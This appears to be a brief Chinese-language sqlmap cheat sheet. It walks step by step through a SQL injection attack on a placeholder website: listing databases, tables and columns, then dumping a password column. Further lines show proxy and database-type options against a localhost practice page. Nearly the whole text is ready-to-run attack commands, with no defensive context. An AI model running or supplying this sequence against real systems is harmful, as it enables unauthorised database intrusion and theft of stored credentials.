ItBJLan 2020-02-20
---------------------------------------------------------------------------------------------------------------------------------------------
(1) 查找数据库
python sqlmap.py -u "http://xxx.cn/index.php/Index/view/id/40.html" --dbs
(2) 通过1中的数据库查找对应的表 (假如通过1,得到的是dataname)
python sqlmap.py -u "http://xxx.cn/index.php/Index/view/id/40.html" -D dataname --tables
(3) 通过2中的数据表得到字段(假如得到的是tablename表)
python sqlmap.py -u "http://xxx.cn/index.php/Index/view/id/40.html" -D dataname -T tablename --columns
(4) 通过3得到字段值(假如从3中得到字段id,password)
python sqlmap.py -u "http://xxx.cn/index.php/Index/view/id/40.html" -D dataname -T tablename -C "password" --dump
-------------------------------------------------------------------------------------------------------------------------------------------
使用代理
sqlmap.py -u "http://localhost/sqlzhurulianxi.php?id=1" --proxy=http://127.0.0.1:8080
指定数据库类型
sqlmap.py -u “http://localhost/sqlzhurulianxi.php?id=1” --dbms=MySQL